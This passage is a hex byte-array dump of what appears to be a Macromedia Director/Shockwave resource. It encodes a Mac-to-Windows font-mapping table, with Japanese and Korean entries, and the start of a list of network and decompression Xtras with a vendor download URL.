0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x73, 0x69,

0x7A, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x2C, 0x20, 0x74, 0x68, 0x65,

0x79, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x79, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x54, 0x48, 0x41, 0x54,

0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4F, 0x4E, 0x4C, 0x59, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20,

0x48, 0x65, 0x72, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79,

0x70, 0x69, 0x63, 0x61, 0x6C, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66,

0x6F, 0x72, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20,

0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A,

0x0D, 0x3B, 0x0D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73,

0x74, 0x65, 0x6D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F,

0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x47,

0x65, 0x6E, 0x65, 0x76, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,

0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53, 0x65, 0x72,

0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69, 0x63,

0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x41, 0x72, 0x69,

0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x54, 0x65, 0x72, 0x6D,

0x69, 0x6E, 0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59, 0x6F,

0x72, 0x6B, 0x22, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D,

0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D,

0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69,

0x6E, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F,

0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D,

0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x31, 0x34,

0x3D, 0x3E, 0x31, 0x32, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E,

0x31, 0x38, 0x20, 0x33, 0x30, 0x3D, 0x3E, 0x32, 0x34, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x50, 0x61,

0x6C, 0x61, 0x74, 0x69, 0x6E, 0x6F, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57,

0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F,

0x6D, 0x61, 0x6E, 0x22, 0x0D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x48, 0x65, 0x72, 0x65, 0x20, 0x61,

0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79, 0x70, 0x69, 0x63, 0x61, 0x6C, 0x20,

0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74, 0x68, 0x65,

0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,

0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A,

0x41, 0x72, 0x69, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69,

0x63, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x22,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A,

0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75,

0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E,

0x20, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E,

0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59,

0x6F, 0x72, 0x6B, 0x22, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E,

0x73, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61,

0x63, 0x3A, 0x47, 0x65, 0x6E, 0x65, 0x76, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x6D,

0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D,

0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61,

0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73, 0x74, 0x65,

0x6D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,

0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x0D, 0x57, 0x69, 0x6E, 0x3A,

0x54, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x0D,

0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52,

0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x54, 0x69,

0x6D, 0x65, 0x73, 0x22, 0x20, 0x31, 0x32, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x31, 0x34, 0x3D, 0x3E,

0x31, 0x38, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x32, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E, 0x33, 0x30,

0x0D, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x57, 0x68, 0x65, 0x6E, 0x20, 0x6D,

0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x57, 0x69, 0x6E, 0x64,

0x6F, 0x77, 0x73, 0x20, 0x74, 0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68,

0x2C, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x43, 0x6F,

0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70,

0x20, 0x6F, 0x6E, 0x74, 0x6F, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x2E, 0x20, 0x20,

0x57, 0x68, 0x65, 0x6E, 0x20, 0x63, 0x6F, 0x6D, 0x69, 0x6E, 0x67, 0x20, 0x62, 0x61, 0x63, 0x6B,

0x20, 0x74, 0x6F, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x6F, 0x6E, 0x6C, 0x79,

0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x0D, 0x3B, 0x20, 0x77,

0x69, 0x6C, 0x6C, 0x20, 0x62, 0x65, 0x20, 0x75, 0x73, 0x65, 0x64, 0x2E, 0x0D, 0x0D, 0x3B, 0x20,

0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61,

0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65, 0x20,

0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65,

0x73, 0x65, 0x20, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x69, 0x73,

0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x20, 0x57, 0x69, 0x6E,

0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2C, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x0D,

0x3B, 0x20, 0x61, 0x6C, 0x6C, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F,

0x6E, 0x74, 0x73, 0x20, 0x61, 0x72, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74,

0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x27, 0x73, 0x20, 0x4F, 0x73,

0x61, 0x6B, 0x61, 0x2E, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x20, 0x69,

0x73, 0x20, 0x75, 0x73, 0x65, 0x64, 0x0D, 0x3B, 0x20, 0x62, 0x65, 0x63, 0x61, 0x75, 0x73, 0x65,

0x20, 0x6F, 0x6E, 0x6C, 0x79, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x20, 0x66, 0x6F, 0x6E, 0x74,

0x73, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20, 0x75, 0x70, 0x70, 0x65, 0x72, 0x2D, 0x41, 0x53, 0x43,

0x49, 0x49, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x73, 0x20, 0x6D, 0x61,

0x70, 0x70, 0x65, 0x64, 0x2E, 0x20, 0x20, 0x54, 0x6F, 0x20, 0x70, 0x72, 0x65, 0x76, 0x65, 0x6E,

0x74, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20,

0x61, 0x6E, 0x79, 0x20, 0x61, 0x64, 0x64, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x61, 0x6C, 0x20, 0x4A,

0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x2C, 0x20, 0x61,

0x64, 0x64, 0x20, 0x74, 0x68, 0x65, 0x6D, 0x20, 0x74, 0x6F, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20,

0x6C, 0x69, 0x73, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20,

0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x64, 0x6F, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x68, 0x61,

0x76, 0x65, 0x20, 0x61, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x73, 0x79,

0x73, 0x74, 0x65, 0x6D, 0x2C, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6E,

0x61, 0x6D, 0x65, 0x73, 0x20, 0x62, 0x65, 0x6C, 0x6F, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x77, 0x69,

0x6C, 0x6C, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x20, 0x74, 0x6F, 0x20, 0x62, 0x65, 0x20,

0x75, 0x6E, 0x72, 0x65, 0x61, 0x64, 0x61, 0x62, 0x6C, 0x65, 0x2E, 0x0D, 0x4D, 0x61, 0x63, 0x3A,

0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF, 0xBC, 0xB3, 0x20, 0xE3,

0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x4D, 0x61, 0x70,

0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF,

0xBC, 0xB3, 0x20, 0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22,

0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61,

0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF,

0xBC, 0xB3, 0x20, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D,

0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20,

0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96,

0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x20, 0x3D,

0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20,

0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96,

0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,

0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F,

0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A,

0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D,

0x3B, 0x20, 0x4B, 0x6F, 0x72, 0x65, 0x61, 0x6E, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61,

0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65,

0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69,

0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,

0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22,

0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65,

0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69,

0x6F, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B,

0xEC, 0x9B, 0x80, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61,

0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94,

0xED, 0x83, 0x95, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57,

0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C,

0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65,

0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0xEC, 0xB2, 0xB4, 0x22,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41,

0x70, 0x70, 0x6C, 0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,

0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63,

0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D,

0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0xEC, 0xB2, 0xB4, 0x22, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65,

0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E,

0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D,

0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D,

0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0xEC, 0xB2, 0xB4, 0x22, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70,

0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,

0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83, 0x95, 0x22,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63,

0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x4D, 0x61, 0x70,

0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83,

0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,

0x4D, 0x61, 0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20,

0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04,

0x00, 0x00, 0x08, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00,

0x00, 0x18, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14,

0x00, 0x00, 0x00, 0x23, 0x06, 0x02, 0x10, 0x49, 0x4E, 0x65, 0x74, 0x55, 0x72, 0x6C, 0x20, 0x50,

0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x49, 0x4E, 0x45, 0x54, 0x55,

0x52, 0x4C, 0x2E, 0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x18, 0x00,

0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,

0x23, 0x06, 0x02, 0x10, 0x4E, 0x65, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x20, 0x50, 0x50, 0x43, 0x20,

0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x4E, 0x45, 0x54, 0x46, 0x49, 0x4C, 0x45, 0x2E,

0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x4B, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x10,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0x25, 0x06, 0x02,

0x11, 0x4E, 0x65, 0x74, 0x4C, 0x69, 0x6E, 0x67, 0x6F, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74,

0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x4E, 0x65, 0x74, 0x6C, 0x69, 0x6E, 0x67, 0x6F, 0x2E, 0x78,

0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0xCC, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00,

0x6C, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x9A, 0x06, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20,

0x44, 0x65, 0x63, 0x6F, 0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50,

0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D,

0x70, 0x72, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x3A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F,

0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D,

0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F,

0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73,

